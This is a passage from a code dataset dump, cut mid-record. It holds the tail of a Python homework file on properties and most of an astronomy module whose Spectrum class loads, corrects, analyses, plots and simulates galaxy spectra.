32)\r\n# \"\"\"\r\n# def __init__(self, temperature=0):\r\n# self._temperature = temperature\r\n#\r\n#\r\n# # create an object\r\n# {obj} = ...\r\n#\r\n# print({obj}.temperature)\r\nclass Celius:\r\n def __init__(self, temperature=0):\r\n self._temperature = temperature\r\n\r\n @property\r\n def temperature(self):\r\n return self._temperature * 1.8 + 32\r\n\r\n\r\ntemperature_instance_0 = Celius()\r\nprint(f'temperature - {temperature_instance_0.temperature}')\r\n","repo_name":"tomkovyd-pasha/cursor_hw","sub_path":"HW5.py","file_name":"HW5.py","file_ext":"py","file_size_in_byte":9071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6591245879","text":"# Internal python modules\nimport os\nfrom textwrap import fill\nimport time\nimport pickle\nimport json\nimport toml\nimport copy\nimport gc\nimport itertools\nimport uuid\n\n# External packages\nimport tqdm\nimport numpy as np\nimport pandas as pd\nfrom numba import jit, njit, prange\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport matplotlib.colors as mplcolor\nimport plotly.subplots\nimport plotly.graph_objects\nfrom joblib import Parallel, delayed\n\nimport scipy.optimize\nimport scipy.integrate\nimport scipy.interpolate\nimport scipy.special\n\nimport astropy.coordinates\nimport astropy.time\nimport astropy.io.fits\nimport astropy.units as u\nimport astropy.constants as const\nimport astropy.convolution\n\nimport astroquery.irsa_dust\nfrom PyAstronomy.pyasl import fastRotBroad\n# import spectres\n\n# Bifrost packages\nimport bifrost.maths as maths\nimport bifrost.utils as utils\nimport bifrost.filters as bfilters\n\n\nclass Spectrum:\n __slots__ = ['wave', 'flux', 'error', 'sky', 'redshift', 'velocity', 'ra', 'dec', 'ebv', 'name', 'output_path',\n '_corrected', 'data', '_normalized']\n\n def __init__(self, wave, flux, error, sky=None, redshift=None, velocity=None, ra=None, dec=None, ebv=None, name='Generic',\n output_path=None, **data):\n \"\"\"\n A class containing data and attributes for a single spectrum of an astronomical object.\n\n :param wave: np.ndarray\n Array of the observed wavelength range of the spectrum, not corrected for redshift, in angstroms.\n :param flux: np.ndarray\n Array of the observed flux of the object over the wavelength range, not corrected for extinction, in\n 10^-17 erg cm^-2 s^-1 angstrom^-1.\n :param error: np.ndarray\n Array of the error associated with the observed flux, also in units of 10^-17 erg cm^-2 s^-1 angstrom^-1.\n :param redshift: float\n Redshift of the object in dimensionless units.\n ***IMPORTANT***\n If none is provided, it is assumed the given wavelength is already corrected to be in the rest frame of the\n source.\n :param velocity: float\n Radial velocity of the object in km/s. An alternative that can be used to calculate the redshift if z is\n not known.\n :param ra: float\n Right ascension in hours.\n :param dec: float\n Declination in degrees.\n :param ebv: float\n Extinction (B-V) color of the object in mag.\n ***IMPORTANT***\n If none is provided, it is assumed the given flux is already corrected for galactic extinction.\n :param name: str\n An identifier for the object spectrum.\n :param data: dict\n Any other parameters that might want to be sorted by.\n :param output_path: str\n A directory where saved files will default to if none is given.\n \"\"\"\n # Observed wavelength array in angstroms\n self.wave = wave\n # Observed flux array in 10^-17 * CGS units\n self.flux = flux\n # Flux error in 10^-17 * CGS units\n self.error = error\n # Sky flux in 10^-17 * CGS units\n self.sky = sky\n # Redshift in units of c\n self.redshift = redshift\n self.velocity = velocity\n # Coordinates\n self.ra = ra\n self.dec = dec\n # Extinction in (B-V) magnitudes\n self.ebv = ebv\n # Name\n self.name = name\n # Output path\n if not output_path:\n output_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), '..', 'data', self.name)\n self.output_path = output_path\n # Verify that everything makes sense\n self._verify()\n self._corrected = False\n self._normalized = False\n\n # Other properties that might want to be sorted by\n self.data = data\n\n def __repr__(self):\n s = '########################################################################################\\n'\n s += f\"{self.name} Spectrum \\n\"\n s += '########################################################################################\\n'\n corrstr = \"(corrected)\" if self._corrected else \"(uncorrected)\"\n s += f\"Wavelength range \" + corrstr + f\": \\t {np.min(self.wave)} - {np.max(self.wave)} angstroms\\n\"\n s += f\"Flux range: \\t {np.max(np.concatenate(([np.min(self.flux)], [0.0])))} - \" \\\n f\"{np.max(self.flux)} * \" \\\n f\"{'10^-17 erg cm^-2 s^-1 angstrom^-1' if not self.normalized else 'normalized units'}\\n\"\n s += f\"Redshift: \\t z = {self.redshift}\\n\"\n s += f\"Extinction: \\t E(B-V) = {self.ebv}\\n\"\n return s\n\n def _verify(self):\n \"\"\"\n Verify that the information in the object makes sense. i.e. the size of wave, flux, and error are all the same.\n\n :return None:\n \"\"\"\n assert self.wave.size == self.flux.size == self.error.size, \\\n \"Wave, flux, and error arrays must be the same size!\"\n\n def apply_corrections(self, r_v=3.1):\n \"\"\"\n Apply all corrections to the spectrum: redshift and extinction\n\n :param r_v: float\n extinction ratio A(V)/E(B-V), default 3.1\n :return None:\n \"\"\"\n if not self._corrected:\n if self.redshift:\n self.wave = maths.cosmological_redshift(self.wave, self.redshift)\n elif self.velocity:\n self.redshift = maths.calc_redshift_sqrt(self.velocity)\n self.wave = maths.cosmological_redshift(self.wave, self.redshift)\n if self.ebv:\n self.flux = maths.correct_extinction(self.wave, self.flux, self.ebv, r_v)\n self._corrected = True\n\n def calc_snr(self):\n if 'snr' not in self.data:\n med = np.nanmedian(self.flux)\n self.data['snr'] = 1 / np.mean(self.error[np.where(np.isfinite(self.error))[0]] / med)\n return self.data['snr']\n\n def calc_line_snr(self, wave_range, key):\n good = np.where(np.isfinite(self.error) & (wave_range[0] < self.wave) & (self.wave < wave_range[1]))[0]\n med = np.nanmedian(self.flux[good])\n self.data[key] = 1 / np.mean(self.error[good] / med)\n return self.data[key]\n\n @property\n def corrected(self):\n return self._corrected\n\n @corrected.setter\n def corrected(self, value):\n raise ValueError(\"The 'corrected' property may not be manually set!\")\n\n @corrected.deleter\n def corrected(self):\n raise ValueError(\"The 'corrected' property may not be deleted!\")\n\n @property\n def normalized(self):\n return self._normalized\n\n @normalized.setter\n def normalized(self, value):\n raise ValueError(\"The 'normalized' property may not be manually set!\")\n\n @normalized.deleter\n def normalized(self):\n raise ValueError(\"The 'normalized' property may not be deleted!\")\n\n def _calc_agn_dist(self, bpt_1, bpt_2, ref_point):\n assert bpt_1 in self.data.keys() and bpt_2 in self.data.keys()\n # Calculate x and y distance between this object and the reference point in the BPT plane\n return self.data[bpt_1] - ref_point[0], self.data[bpt_2] - ref_point[1]\n\n def calc_agn_frac(self, bpt_1, bpt_2, ref_point):\n \"\"\"\n Calculate the AGN fraction of an object based on BPT data.\n\n :param bpt_1: str\n The name of the first BPT ratio, should be defined in self.data\n :param bpt_2: str\n The name of the second BPT ratio, should be defined in self.data\n :param ref_point: tuple\n The reference point to calculate the distance from\n :return agn_frac: float\n The AGN fraction of the object, defined as 1 / distance.\n \"\"\"\n dx, dy = self._calc_agn_dist(bpt_1, bpt_2, ref_point)\n d = np.hypot(dx, dy)\n # AGN fraction = 1 / distance\n self.data[\"agn_frac\"] = 1 / d\n return self.data[\"agn_frac\"]\n\n def k01_agn_class(self, bpt_x, bpt_y):\n \"\"\"\n Calculate whether the spectrum is classified as an AGN by the Kewley et al. 2001 classification scheme.\n\n :param bpt_x: str\n The name of the x axis BPT ratio, should be defined in self.data\n :param bpt_y: str\n The name of the y axis BPT ratio, should be defined in self.data\n :return agn: bool\n True if object is an AGN, otherwise False.\n \"\"\"\n k_line = 0.61 / (self.data[bpt_x] - 0.47) + 1.19\n agn = self.data[bpt_y] > k_line or self.data[bpt_x] >= 0.47\n self.data[\"agn_class\"] = agn\n return self.data[\"agn_class\"]\n\n def plot(self, convolve_width=0, line_labels=True, emline_color=\"rebeccapurple\", absorp_color=\"darkgoldenrod\", cline_color=\"cyan\",\n overwrite=False, fname=None, backend='plotly', _range=None, ylim=None, title_text=None, normalized=False,\n plot_model=None, shade_reg=None, overlays=None):\n \"\"\"\n Plot the spectrum.\n\n :param convolve_width: optional, int\n The width of convolution performed before plotting the spectrum with a Box1DKernel\n :param line_labels: optional, bool\n Whether or not to plot labels for emission lines, absorption lines, and coronal lines. Default is True.\n :param emline_color: optional, str\n If backend is pyplot, this specifies the color of emission lines plotted. Default is 'rebeccapurple'.\n :param absorp_color: optional, str\n If backend is pyplot, this specifies the color of absorption lines plotted. Default is 'darkgoldenrod'.\n :param cline_color: optional, str\n If backend is pyplot, this specifies the color of coronal lines plotted. Default is 'cyan'.\n :param overwrite: optional, bool\n If true, overwrites the file if it already exists. Otherwise it is not replotted. Default is false.\n :param fname: optional, str\n The path and file name to save the plot to.\n :param backend: optional, str\n May be 'pyplot' to use the pyplot module or 'plotly' to use the plotly module for plotting. Default is\n 'plotly'.\n :param _range: optional, tuple\n Limits on the x-data between two wavelengths.\n :param ylim: optional, tuple\n Limits on the y-data between two fluxes.\n :param title_text: optional, str\n Text to append to the title of the plot.\n :param normalized: bool\n Whether or not to normalize the flux before plotting.\n :param plot_model: optional, tuple\n A tuple of two strings corresponding to keys for the data dict to plot x and y data overtop of the spectrum.\n :param shade_reg: optional, list\n A list of tuples indicating region(s) within the plot to shade\n :param overlays: optional, list\n A list containing other Spectrum objects (not a Spectra/Stack object) which are to be plotted in addition\n to the current Spectrum object.\n :return None:\n \"\"\"\n # Make sure corrections have been applied\n self.apply_corrections()\n if not fname:\n fname = os.path.join(self.output_path, self.name.replace(' ', '_') + '.spectrum') + ('.pdf', '.html')[\n backend == 'plotly']\n if os.path.exists(fname) and not overwrite:\n return\n\n # Convolve the spectrum\n if convolve_width > 0:\n kernel = astropy.convolution.Box1DKernel(convolve_width)\n spectrum = astropy.convolution.convolve(self.flux, kernel)\n error = astropy.convolution.convolve(self.error, kernel)\n else:\n spectrum = self.flux\n error = self.error\n # spectrum[spectrum < 0.] = 0.\n # error[error < 0.] = 0.\n if _range:\n good = np.where((_range[0] < self.wave) & (self.wave < _range[1]))[0]\n wave = self.wave[good]\n spectrum = spectrum[good]\n error = error[good]\n else:\n wave = self.wave\n \n if normalized:\n mu = np.nanmean(spectrum)\n sigma = np.nanstd(spectrum)\n spectrum = (spectrum - mu) / sigma\n error = error / sigma\n \n bad = ~np.isfinite(spectrum)\n if np.isfinite(np.nanmedian(spectrum)):\n spectrum[bad] = np.nanmedian(spectrum)\n else:\n spectrum[bad] = 0. if normalized else 1.\n if np.isfinite(np.nanmedian(error)):\n error[bad] = np.nanmedian(error)\n else:\n error[bad] = 1.\n\n # Standard matplotlib backend (non-interactive)\n if backend == 'pyplot':\n # Plot the spectrum and error\n fig, ax = plt.subplots(figsize=(20, 10))\n linewidth = .5\n linestyle = '--'\n ax.plot(wave, spectrum, '-', color='k', lw=linewidth, label=self.name)\n if plot_model is not None:\n if plot_model[0] in self.data and plot_model[1] in self.data:\n ax.plot(self.data[plot_model[0]], self.data[plot_model[1]], '-', color='r', lw=linewidth)\n else:\n print(f\"WARNING: {plot_model[0]} or {plot_model[1]} not found in {self.name}'s data!\")\n if overlays is not None:\n for overlay in overlays:\n overlay.apply_corrections()\n if convolve_width > 0:\n kernel = astropy.convolution.Box1DKernel(convolve_width)\n speci = astropy.convolution.convolve(overlay.flux, kernel)\n erri = astropy.convolution.convolve(overlay.error, kernel)\n else:\n speci = overlay.flux\n erri = overlay.error\n # # speci[speci < 0] = 0\n # erri[erri < 0] = 0\n if _range:\n good = np.where((_range[0] < overlay.wave) & (overlay.wave < _range[1]))[0]\n wavei = overlay.wave[good]\n speci = speci[good]\n erri = erri[good]\n else:\n wavei = overlay.wave\n if normalized:\n mui = np.nanmean(speci)\n sigmi = np.nanstd(speci)\n speci = (speci - mui) / sigmi\n erri = erri / sigmi\n bad = ~np.isfinite(speci)\n if np.isfinite(np.nanmedian(speci)):\n speci[bad] = np.nanmedian(speci)\n else:\n speci[bad] = 0. if normalized else 1.\n if np.isfinite(np.nanmedian(erri)):\n erri[bad] = np.nanmedian(erri)\n else:\n erri[bad] = 1.\n ax.plot(wavei, speci, '-', lw=.5, label=overlay.name)\n ax.legend()\n else:\n ax.fill_between(wave, spectrum - error, spectrum + error, color='mediumaquamarine', alpha=0.5)\n\n # Plot emission and absorption lines\n if line_labels:\n # OVI, Ly-alpha, NV, OI, CII, SiIV, SiIV/OIV, CIV, HeII\n # OIII, AlIII, CIII, CII, NeIV, MgII, [OII]\n # [OII], H-delta, H-gamma, [OIII], H-beta, [OIII], [OIII], [OI], [OI]\n # [NII], H-alpha, [NII], [SII], [SII]\n emlines = np.array(\n [1033.820, 1215.240, 1240.810, 1305.530, 1335.310, 1397.610, 1399.800, 1549.480, 1640.400,\n 1665.850, 1857.400, 1908.734, 2326.000, 2439.500, 2799.117, 3727.092,\n 3729.875, 4102.890, 4341.680, 4364.436, 4862.680, 4960.295, 5008.240, 6300.304, 6363.776,\n 6549.860, 6564.610, 6585.270, 6718.290, 6732.670])\n for line in emlines:\n ax.axvline(line, color=emline_color, lw=linewidth, linestyle=linestyle, alpha=0.5)\n # Ne V, Ne V*, Fe VII, Fe V, Fe V, Ne III (not coronal), Fe V, Fe VII, Fe VI, Fe VII, Fe VI, Fe VII, Fe XIV,\n # Ca V, Fe VI, Ar X, Fe VII, Fe VII*, Fe X, Fe XI\n clines = np.array(\n [3346.790, 3426.850, 3759, 3839, 3891, 3970, 4181, 4893, 5146, 5159, 5176, 5276, 5303, 5309, 5335,\n 5533, 5720, 6087, 6374.510, 7891.800])\n for line in clines:\n ax.axvline(line, color=cline_color, lw=linewidth * 2, linestyle=linestyle, alpha=0.75)\n\n # Ca K, Ca H, Mg1b, Na, CaII, CaII, CaII\n abslines = np.array([3934.777, 3969.588, 5176.700, 5895.600, 8500.3600, 8544.440, 8664.520])\n for line in abslines:\n ax.axvline(line, color=absorp_color, lw=linewidth, linestyle=linestyle, alpha=0.5)\n\n # Set up axis labels and formatting\n fontsize = 20\n ax.set_xlabel(r'$\\lambda_{\\rm{rest}}$ ($\\rm{\\AA}$)', fontsize=fontsize)\n if not normalized:\n ax.set_ylabel(r'$f_\\lambda$ ($10^{-17}$ erg cm$^{-2}$ s$^{-1}$ $\\rm{\\AA}^{-1}$)', fontsize=fontsize)\n else:\n ax.set_ylabel(r'$f_\\lambda$ (normalized)', fontsize=fontsize)\n title = '%s, $z=%.5f$' % (self.name, self.redshift)\n if title_text:\n title += ', ' + title_text\n ax.set_title(title, fontsize=fontsize)\n ax.tick_params(axis='both', labelsize=fontsize - 2)\n if wave.size > 1:\n ax.set_xlim(np.nanmin(wave), np.nanmax(wave))\n if ylim:\n ax.set_ylim(ylim)\n elif wave.size > 1:\n ax.set_ylim(0., np.nanmax(spectrum))\n if shade_reg:\n for sr in shade_reg:\n ax.axvspan(*sr, color='grey', alpha=0.5)\n\n fig.savefig(fname, dpi=300, bbox_inches='tight')\n plt.clf()\n plt.cla()\n plt.close('all')\n\n # Interactive HTML plots through the plotly backend\n elif backend == 'plotly':\n fig = plotly.subplots.make_subplots(rows=1, cols=1)\n linewidth = .5\n good = np.where(np.isfinite(spectrum) & np.isfinite(error))[0]\n fig.add_trace(plotly.graph_objects.Scatter(x=wave, y=spectrum, line=dict(color='black', width=linewidth),\n name='Data' if overlays is None else self.name + ' data',\n showlegend=False if overlays is None else True))\n fig.add_trace(plotly.graph_objects.Scatter(x=wave[good], y=(spectrum + error)[good],\n line=dict(color='#60dbbd', width=0),\n fillcolor='rgba(96, 219, 189, 0.6)' if overlays is None else 'rgba(0, 0, 0, 0.6)',\n name='Upper Bound' if overlays is None else self.name + ' upper bound',\n showlegend=False if overlays is None else True))\n fig.add_trace(plotly.graph_objects.Scatter(x=wave[good], y=(spectrum - error)[good],\n line=dict(color='#60dbbd', width=0),\n fillcolor='rgba(96, 219, 189, 0.6)' if overlays is None else 'rgba(0, 0, 0, 0.6)',\n fill='tonexty', name='Lower Bound' if overlays is None else self.name + ' lower bound',\n showlegend=False if overlays is None else True))\n if plot_model:\n if plot_model[0] in self.data and plot_model[1] in self.data:\n fig.add_trace(plotly.graph_objects.Scatter(x=self.data[plot_model[0]], y=self.data[plot_model[1]],\n line=dict(color='#e0191c', width=linewidth),\n name='Model', showlegend=False))\n else:\n print(f\"WARNING: {plot_model[0]} or {plot_model[1]} not found in {self.name}'s data!\")\n if overlays is not None:\n colorlist = ['#7fffd4', '#8a2be2', '#d2691e', '#6495ed', '#006400', '#e9967a', '#2f4f4f', '#1e90ff',\n '#adff2f', '#4b0082', '#20b2aa', '#7b68ee']\n for i, overlay in enumerate(overlays):\n overlay.apply_corrections()\n if convolve_width > 0:\n kernel = astropy.convolution.Box1DKernel(convolve_width)\n speci = astropy.convolution.convolve(overlay.flux, kernel)\n erri = astropy.convolution.convolve(overlay.error, kernel)\n else:\n speci = overlay.flux\n erri = overlay.error\n # speci[speci < 0] = 0\n # erri[erri < 0] = 0\n if _range:\n good = np.where((_range[0] < overlay.wave) & (overlay.wave < _range[1]))[0]\n wavei = overlay.wave[good]\n speci = speci[good]\n erri = erri[good]\n else:\n wavei = overlay.wave\n if normalized:\n mui = np.nanmean(speci)\n sigmi = np.nanstd(speci)\n speci = (speci - mui) / sigmi\n erri = erri / sigmi\n bad = ~np.isfinite(speci)\n if np.isfinite(np.nanmedian(speci)):\n speci[bad] = np.nanmedian(speci)\n else:\n speci[bad] = 0. if normalized else 1.\n if np.isfinite(np.nanmedian(erri)):\n erri[bad] = np.nanmedian(erri)\n else:\n erri[bad] = 1.\n good = np.where(np.isfinite(speci) & np.isfinite(erri))[0]\n fig.add_trace(plotly.graph_objects.Scatter(x=wavei, y=speci, line=dict(color=colorlist[i % len(colorlist)], width=linewidth),\n name=overlay.name + ' data', showlegend=True))\n fig.add_trace(plotly.graph_objects.Scatter(x=wavei[good], y=(speci+erri)[good], line=dict(color=colorlist[i % len(colorlist)], width=0),\n name=overlay.name + ' upper bound',\n fillcolor='rgba(' + str(int(colorlist[i % len(colorlist)][1:3], 16)) +\n ', ' + str(int(colorlist[i % len(colorlist)][3:5], 16)) +\n ', ' + str(int(colorlist[i % len(colorlist)][5:7], 16)) + ', 0.6)',\n showlegend=True))\n fig.add_trace(plotly.graph_objects.Scatter(x=wavei[good], y=(speci-erri)[good], line=dict(color=colorlist[i % len(colorlist)], width=0),\n fillcolor='rgba(' + str(int(colorlist[i % len(colorlist)][1:3], 16)) +\n ', ' + str(int(colorlist[i % len(colorlist)][3:5], 16)) +\n ', ' + str(int(colorlist[i % len(colorlist)][5:7], 16)) + ', 0.6)',\n fill='tonexty', name=overlay.name + ' lower bound', showlegend=True))\n fig.update_layout(showlegend=True)\n\n # Plot emission and absoprtion lines\n if line_labels:\n emlines = np.array(\n [1033.820, 1215.240, 1240.810, 1305.530, 1335.310, 1397.610, 1399.800, 1549.480, 1640.400,\n 1665.850, 1857.400, 1908.734, 2326.000, 2439.500, 2799.117, 3346.790, 3426.850, 3727.092,\n 3729.875, 4102.890, 4341.680, 4364.436, 4862.680, 4960.295, 5008.240, 6300.304, 6363.776,\n 6374.510, 6549.860, 6564.610, 6585.270, 6718.290, 6732.670, 7891.800])\n clines = np.array(\n [3346.790, 3426.850, 3759, 3839, 3891, 3970, 4181, 4893, 5146, 5159, 5176, 5276, 5303, 5309, 5335,\n 5533, 5720, 6087, 6374.510, 7891.800])\n cline_names = np.array(\n ['[Ne V]', '[Ne V]*', '[Fe VII]', '[Fe V]', '[Fe V]', '[Ne III]', '[Fe V]', '[Fe VII]', '[Fe VI]',\n '[Fe VII]', '[Fe VI]', '[Fe VII]', '[Fe XIV]', '[Ca V]', '[Fe VI]', '[Ar X]', '[Fe VII]', '[Fe VII]*',\n '[Fe X]', '[Fe XI]'], dtype=str\n )\n abslines = np.array([3934.777, 3969.588, 5176.700, 5895.600, 8500.3600, 8544.440, 8664.520])\n for line in emlines:\n fig.add_vline(x=line, line_width=linewidth, line_dash='dash', line_color='#663399')\n for line, name in zip(clines, cline_names):\n fig.add_vline(x=line, line_width=2 * linewidth, line_dash='dot', line_color='#226666',\n annotation_text=name, annotation_position='top right', annotation_font_size=12)\n for line in abslines:\n fig.add_vline(x=line, line_width=linewidth, line_dash='dash', line_color='#d1c779')\n\n if not normalized:\n y_title = '$f_\\\\lambda\\\\ (10^{-17} {\\\\rm erg} {\\\\rm s}^{-1} {\\\\rm cm}^{-2} Å^{-1})$'\n else:\n y_title = '$f_\\\\lambda\\\\ ({\\\\rm normalized})$'\n title = '${\\\\rm %s}, z=%.5f$' % (self.name, self.redshift)\n if overlays is not None:\n title = '$' + '\\ \\| \\ '.join([r'{\\rm %s}, z=%.5f' % (name, redshift) for name, redshift in zip(\n [self.name] + [o.name for o in overlays], [self.redshift] + [o.redshift for o in overlays]\n )]) + '$'\n if title_text:\n if '$' in title_text:\n title = '$' + title.replace('$','') + '\\ \\| \\ ' + title_text.replace('$','') + '$'\n else:\n title += ', ' + title_text\n fig.update_layout(\n yaxis_title=y_title,\n xaxis_title='$\\\\lambda_{\\\\rm rest}\\\\ (Å)$',\n title=title,\n hovermode='x',\n template='plotly_white'\n )\n\n fig.update_layout(\n font_family=\"Georgia, Times New Roman, Serif\",\n # font_color=\"blue\",\n title_font_family=\"Georgia, Times New Roman, Serif\",\n # title_font_color=\"red\",\n # legend_title_font_color=\"green\"\n )\n fig.update_xaxes(title_font_family=\"Georgia, Times New Roman, Serif\")\n fig.update_yaxes(title_font_family=\"Georgia, Times New Roman, Serif\")\n\n if wave.size > 1:\n _range = (np.nanmin(wave), np.nanmax(wave))\n _yrange = (0, np.nanmax(spectrum) + .3)\n else:\n _range = None\n _yrange = None\n fig.update_xaxes(\n range=_range,\n constrain='domain'\n )\n fig.update_yaxes(\n range=_yrange if not ylim else ylim,\n constrain='domain'\n )\n fig.write_html(fname, include_mathjax=\"cdn\")\n # fig.write_image(fname.replace('.html', '.pdf'), width=1280, height=540)\n\n def save_pickle(self):\n \"\"\"\n Save the object contents to a pickle file\n\n :return None:\n \"\"\"\n with open(os.path.join(self.output_path, self.name.replace(' ', '_') + '.data.pkl'), 'wb') as handle:\n pickle.dump(self, handle)\n\n @classmethod\n def from_fits(cls, filepath, name, save_all_data=False):\n \"\"\"\n Create a spectrum object from a fits file\n This function was adapted from BADASS3, created by Remington Sexton, https://github.com/remingtonsexton/BADASS3.\n\n :param filepath: str\n The path to the fits file\n :param name: str, optional\n The name of the spectrum.\n :param save_all_data: bool\n Whether or not to append data within the FITS file to the object's data dictionary\n :return cls: Spectrum\n The Spectrum object created from the fits file.\n \"\"\"\n # Load the data\n data_dict = {}\n with astropy.io.fits.open(filepath) as hdu:\n\n specobj = copy.deepcopy(hdu[2].data)\n z = specobj['z'][0]\n if name is None:\n try:\n name = specobj['SPECOBJID'][0]\n if type(name) is str:\n name = name.strip()\n else:\n name = str(name)\n except:\n # If a SPECOBJID key can't be found, just name from the file name\n name = filepath.split(os.sep)[-1].split('.')[0]\n\n hdr = copy.deepcopy(hdu[0].header)\n try:\n ra = hdr['RA']\n dec = hdr['DEC']\n except KeyError:\n ra = specobj['PLUG_RA'][0]\n dec = specobj['PLUG_DEC'][0]\n\n t = copy.deepcopy(hdu[1].data)\n q = copy.deepcopy(hdu[3].data)\n\n # Unpack the spectra\n flux = t['flux']\n wave = np.power(10, t['loglam'])\n error = np.sqrt(1 / t['ivar'])\n try:\n sky = t['sky']\n except:\n sky = None\n # and_mask = t['and_mask']\n\n if save_all_data:\n for key in specobj.names:\n if key not in ('z', 'PLUG_RA', 'PLUG_DEC'):\n data_dict[key] = specobj[key]\n for key in hdr:\n if key not in data_dict.keys() and key not in ('RA', 'DEC'):\n data_dict[key] = hdr[key]\n for key in t.names:\n if key not in data_dict.keys() and key not in ('flux', 'loglam', 'ivar', 'sky'):\n data_dict[key] = t[key]\n for key in q.names:\n if key not in data_dict.keys():\n data_dict[key] = q[key]\n\n del t\n del q\n del hdr\n del specobj\n\n # Interpolating over bad pixels\n bad = np.where(~np.isfinite(flux) & ~np.isfinite(error))[0]\n\n # error[bad] = np.nanmedian(error)\n\n # Insert additional nans next to bad pixels\n def insert_nans(spec, _bad):\n all_bad = np.unique(np.concatenate((_bad - 1, _bad, _bad + 1)))\n all_bad = np.array([ab for ab in all_bad if 0 < ab < len(spec)])\n try:\n spec[all_bad] = np.nan\n return spec\n except IndexError:\n return spec\n\n def nan_helper(spec):\n return np.isnan(spec), lambda q: q.nonzero()[0]\n\n flux = insert_nans(flux, bad)\n nans, x = nan_helper(flux)\n if len(flux[~nans]) > 0:\n flux[nans] = np.interp(x(nans), x(~nans), flux[~nans])\n\n error = insert_nans(error, bad)\n nans, x = nan_helper(error)\n if len(error[~nans]) > 0:\n error[nans] = np.interp(x(nans), x(~nans), error[~nans])\n\n coord = astropy.coordinates.SkyCoord(ra=ra, dec=dec, unit=(u.deg, u.deg), frame='fk5')\n try:\n table = astroquery.irsa_dust.IrsaDust.get_query_table(coord, section='ebv')\n ebv = table['ext SandF mean'][0]\n except:\n ebv = 0.04\n\n # Convert to native endianness so numba works properly\n if wave.dtype.byteorder != '=':\n wave.byteswap(inplace=True)\n wave = wave.newbyteorder('=')\n if flux.dtype.byteorder != '=':\n flux.byteswap(inplace=True)\n flux = flux.newbyteorder('=')\n if error.dtype.byteorder != '=':\n error.byteswap(inplace=True)\n error = error.newbyteorder('=')\n\n return cls(wave, flux, error, sky, redshift=z, ra=ra / 15, dec=dec, ebv=ebv, name=name, **data_dict)\n\n \n @staticmethod\n def emission_line(true_line, amp, fwhm, voff, h=None, eta_mix=None, disp_inst=None, min_wave=3000, max_wave=8000, \n size=10_000, profile=\"GH\"):\n\n # Logarithmically spaced wavelength grid\n wave = np.geomspace(min_wave, max_wave, size)\n frac = wave[1]/wave[0]\n\n # Optionally add some intrinsic dispersion to simulate a real spectrograph\n # Size of every pixel in angstroms\n dwave = (frac - 1) * wave\n # Intrinsic dispersion in pixels per pixel\n if disp_inst is None:\n disp_inst = 1 / dwave\n # FWHM dispersion in angstroms\n fwhm_inst = 2.3548 * disp_inst * dwave\n\n # Constant velocity scale per pixel -- which is why we choose a logarithmically spaced grid\n c = const.c.to('km/s').value\n velscale = np.log(frac) * c\n\n # Add instrumental fwhm in quadrature\n fwhm_interp = scipy.interpolate.interp1d(wave, fwhm_inst, kind='linear', bounds_error=False, fill_value=(1.e-10, 1.e-10))\n fwhm_inst_kms = (fwhm_interp(true_line) / true_line) * c\n fwhm0 = np.hypot(fwhm, fwhm_inst_kms)\n\n # Convert from km/s to pixels\n fwhm_pix = fwhm0 / velscale\n sigma = (fwhm0/2.3548) / velscale\n shift = voff / velscale\n\n # Convert x from angstroms to pixels\n x_pix = np.array(range(len(wave)))\n pix_interp = scipy.interpolate.interp1d(wave, x_pix, kind='linear', bounds_error=False, fill_value=(1.e-10, 1.e-10))\n center_pix = pix_interp(true_line) + shift\n\n if profile == 'random':\n profile = np.random.choice([\"GH\", \"L\", \"V\"])\n\n if profile in (\"GH\", \"G\"):\n # Calculate moments and normalization constants\n w = (x_pix - center_pix) / sigma\n if h is None:\n h = [0, 0]\n moments = np.arange(3, len(h) + 3)\n norm = np.sqrt(scipy.special.factorial(moments)*2**moments)\n coeff = np.concatenate(([1, 0, 0], h/norm))\n\n # Combine Gaussian and Hermite profiles\n flux = 1 / (np.sqrt(2 * np.pi) * sigma) * np.exp(-w**2/2) * np.polynomial.hermite.hermval(w, coeff)\n flux[flux < 0] = 0\n\n elif profile == \"L\":\n # Calculate Lorentzian profile\n gamma = 0.5 * fwhm_pix\n flux = (gamma**2 / (gamma**2 + (x_pix - center_pix)**2))\n\n elif profile == \"V\":\n # Calculate pseudo-Voigt profile -- combination of Gaussian and Lorentzian by some mixing parameter eta\n w = (x_pix - center_pix) / sigma\n gauss = 1 / (np.sqrt(2 * np.pi) * sigma) * np.exp(-w**2/2)\n gamma = 0.5 * fwhm_pix\n lorentz = 1 / np.pi * gamma / (gamma**2 + (x_pix - center_pix)**2)\n\n if eta_mix is None:\n eta_mix = 0.5\n flux = ((eta_mix * gauss) + ((1 - eta_mix) * lorentz))\n\n else:\n raise ValueError(f\"Invalid profile type {profile}! Must be one of 'GH', 'G', 'L', or 'V'\")\n\n # Renormalize\n flux /= np.nanmax(flux)\n flux *= amp\n\n return wave, flux\n\n @classmethod\n def simulated(cls, true_line, baseline, amp, fwhm, voff, alpha=None, h=None, eta_mix=None, noise_amp=None, seed=None,\n disp_inst=None, min_wave=3000, max_wave=8000, size=10_000, profile=\"GH\", name=None):\n \"\"\"\n Create a simulated spectrum object.\n\n :param true_line: float\n The wavelength of the emission line to model, in angstroms.\n :param baseline: float\n The baseline flux of the spectrum, in 10^-17 erg/s/cm^2/angstrom.\n :param amp: float\n The amplitude of the Gaussian profile, in 10^-17 erg/s/cm^2/angstrom.\n :param fwhm: float\n The full-width at half-maximum of the Gaussian profile (h2), in km/s.\n :param voff: float\n The velocity offset of the Gaussian profile (h1), in km/s.\n :param alpha: float\n Simple power law slope.\n :param h: array\n Array of hermite moments for order 3 and higher.\n :param eta_mix: float\n Mixing parameter of Pseudo-Voigt profile.\n :param noise_amp: float, optional\n Amplitude of random noise to be added, in 10^-17 erg/s/cm^2/angstrom.\n :param disp_inst: array, optional\n Intrinsic dispersion in pixels per pixel.\n :param profile: str, optional\n The line profile to use - \"GH\" or \"G\" for Gauss-Hermite, \"L\" for lorentzian, \"V\" for pseudo-Voigt\n :param min_wave: float\n Minimum wavelength in the grid.\n :param max_wave: float\n Maximum wavelength in the grid.\n :param size: integer\n The number of datapoints in the wavelength/pixel grid.\n :param name: string\n The name of the spectrum.\n \"\"\"\n if type(true_line) in (int, float):\n wave, flux = cls.emission_line(true_line, amp, fwhm, voff, h, eta_mix, disp_inst, min_wave, max_wave, \n size, profile)\n elif type(true_line) in (list, np.ndarray):\n flux = np.zeros(size)\n # Iterate over any number of potential values for the true wavelength, amplitude, FWHM, etc. to \n # create superpositions of many line profiles\n for ti, ampi, fwhmi, voffi, 